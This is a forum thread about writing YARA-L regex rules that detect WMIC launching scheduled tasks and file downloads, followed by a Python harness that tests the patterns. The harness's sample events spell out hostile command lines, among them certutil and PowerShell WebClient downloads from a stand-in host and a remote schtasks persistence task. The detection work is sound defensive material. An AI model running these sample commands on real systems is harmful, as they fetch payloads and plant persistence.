WMIC Suspicious Scheduled Tasks and WMIC File Download

Hi, does anyone have a sample rule example for detecting WMIC Suspicious Scheduled Tasks and WMIC File Download? I am looking for both Scheduled Task and File Download. My search of GitHub did not fetch me any results, unfortunately.


Good morning - there are samples out there using WMIC.exe on the community site.  However, they are just calling a different process.  

You could modify this to include schtasks.exe. I included the rest of the events section of the rule below this piece. I have some other options I could share later. In this example you just need to determine what you deem suspicious and find where schtasks.exe resides.

re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*process.*call.*create.*net.*stop.*C:\\Windows\\Temp\\tmp.log"`) nocase

---------/-----------/
events:
$process.metadata.event_type = "PROCESS_LAUNCH"
$process.principal.hostname = $hostname
$process.target.process.command_line = $command_line

// cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as needed
// other wmic switches like /user and /password, these have been excluded to focus on the commands being issued since local access does not require these
(
re.regex($process.target.process.command_line, `(|cmd.*/c).*7z.*a.*-p.*c:\\windows\\temp\\.*.7z`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*c:\\Windows\\system32\\pcwrun.exe.*c:\\Users\\Administrator\\Desktop\\Win.exe`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c|cmdbak.*/c).*ping.*-n.*1.*127\.0\.0\.1.*c:\\Windows\\temp\\(putty|tmp).log`) nocase or
// The following line could be swapped for the previous line for a looser match. It was observed during testing that a c2 running powershell logged putty.log as a file creation but not in the command line process event
//re.regex($process.target.process.command_line, `(|cmd.*/c).*ping.*-n.*1.*127\.0\.0\.1`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*dir.*127\.0\.0\.1\\c\$.*/od`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*ping.*-a.*-n.*1`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*process.*call.*create.*net.*stop.*C:\\Windows\\Temp\\tmp.log"`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*\\ADMIN\$\\__.*2>&1`) nocase or
//The following line could be swapped for the previous line for a looser match, but potentially noisier
//re.regex($process.target.process.command_line, `(|cmd.*/c).*\\ADMIN\$\\__`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*net.*use.*127\.0\.0\.1\\ipc\$.*/y.*/d`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*powershell.*start-process.*-filepath.*c:\\windows\\temp\\.*.bat.*-windowstyle.*Hidden`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*rar\.exe.*a.*c:\\Windows\\temp\\.*D:\\.*`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*cmd.*/c.*whoami`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*xcopy.*c:\\windows\\temp\\hp.*d:\\`) nocase
)

---------/------------/

I don't have anything off the top of my head but I do have a few thoughts about this that perhaps might help a little...

In the rule above, we have a number of different actions that an adversary might take, and of course there are a number of permutations, so the following line is a good example of what that command line could look like; it picks up the whoami without just looking for all whoami traffic.

re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*cmd.*/c.*whoami`) nocase

Here is what a scheduled task event being called through wmic might look like. Schtasks in general can be very problematic, since there are plenty of good reasons to see scheduled tasks run, be created or be modified, unless you have a firm grip on them within the org.

wmic /node:<ip address> /user:<userid> process call create "cmd.exe /c schtasks"

Based on this format, you could use the above as a template to look for scheduled tasks being called like this:

re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*cmd.*/c.*schtasks`) nocase

That of course doesn't cover at.exe, nor does it cover PowerShell running schtasks or Impacket, but hopefully it gets you going in the right direction. Please test it first.

Regarding downloads, I'm thinking more along the lines of either wmic being used to call a script that has a download function in it, or doing something like the above and calling wget, curl or some other app to initiate a download of a file. Again, since there are a number of ways to do that, I'm not sure where you want to start, but hopefully that gets you going in the right direction.
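The following is an added example, not part of either reply above and not the original poster's rule. It takes the schtasks and whoami regexes from the replies, adds an assumed third regex for wmic spawning common download tools (certutil, bitsadmin, curl, wget, PowerShell web-client cmdlets), and runs all three over constructed PROCESS_LAUNCH command lines with Python's re module, so you can see which lines fire and which benign ones stay quiet before putting the patterns into a YARA-L rule. Chronicle's re.regex uses RE2; these patterns avoid lookaround and backreferences, so RE2 and Python read them the same way, and YARA-L's nocase maps to re.IGNORECASE. Hostnames, IPs and paths in the sample events are made up.

```python
"""Offline check of WMIC-based command-line regexes against constructed
PROCESS_LAUNCH events (added example; the sample telemetry is fabricated)."""
import re

# Regexes in the same shape as the re.regex(...) lines in the thread.
# wmic_schtasks and wmic_whoami are taken from the replies; wmic_download_tool
# is an assumption added here and is not from the original post.
PATTERNS = {
    "wmic_schtasks": r"(|cmd.*/c).*wmic.*cmd.*/c.*schtasks",
    "wmic_whoami": r"(|cmd.*/c).*wmic.*cmd.*/c.*whoami",
    "wmic_download_tool": (
        r"wmic.*process.*call.*create.*"
        r"(certutil.*-urlcache|bitsadmin.*/transfer|curl.*http|wget.*http|"
        r"powershell.*(downloadfile|downloadstring|invoke-webrequest|iwr\b|start-bitstransfer))"
    ),
}

# YARA-L `nocase` corresponds to re.IGNORECASE here.
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in PATTERNS.items()}

# Constructed events carrying the two fields the rule's events section reads
# ($process.principal.hostname and $process.target.process.command_line).
SAMPLE_EVENTS = [
    # remote wmic creating a scheduled task through cmd /c (should fire)
    {"hostname": "ws01", "command_line":
     r'wmic /node:10.0.0.5 /user:corp\admin process call create "cmd.exe /c schtasks /create /tn Updater /tr c:\windows\temp\u.bat /sc onlogon /ru system"'},
    # local wmic running whoami through cmd /c (should fire)
    {"hostname": "ws02", "command_line":
     r'cmd.exe /c wmic process call create "cmd.exe /c whoami > c:\windows\temp\w.txt"'},
    # remote wmic spawning certutil to fetch a file (should fire)
    {"hostname": "srv01", "command_line":
     r'wmic /node:10.0.0.7 process call create "certutil -urlcache -split -f http://198.51.100.9/p.exe c:\windows\temp\p.exe"'},
    # wmic spawning a PowerShell WebClient download (should fire)
    {"hostname": "srv02", "command_line":
     r"wmic process call create \"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.9/a.ps1','c:\windows\temp\a.ps1')\""},
    # benign: schtasks on its own, no wmic (should NOT fire)
    {"hostname": "ws03", "command_line": r"schtasks /query /fo LIST /v"},
    # benign: wmic inventory queries (should NOT fire)
    {"hostname": "ws04", "command_line": r"wmic os get caption"},
    {"hostname": "ws05", "command_line": r'"C:\Windows\System32\wbem\WMIC.exe" computersystem get name'},
    # benign: curl without wmic (should NOT fire)
    {"hostname": "ws06", "command_line": r"curl.exe -s http://intranet.corp.local/health"},
]


def match_events(events, compiled=COMPILED):
    """Return (hostname, rule_name, command_line) for every pattern that
    matches each event's command line, in event order."""
    hits = []
    for ev in events:
        cl = ev["command_line"]
        for name, rx in compiled.items():
            if rx.search(cl):
                hits.append((ev["hostname"], name, cl))
    return hits


def rules_fired(events, compiled=COMPILED):
    """Set of rule names that fired at least once over the events."""
    return {name for _, name, _ in match_events(events, compiled)}


if __name__ == "__main__":
    for host, name, cl in match_events(SAMPLE_EVENTS):
        print(f"{host:6} {name:20} {cl}")
```

Run it as-is to see the four expected hits; then drop your own command lines from the EDR into SAMPLE_EVENTS to check what the patterns would miss (wmic calling a .bat or .ps1 that does the download inside the script, for instance, will not match the download regex because the tool name never appears on the wmic command line).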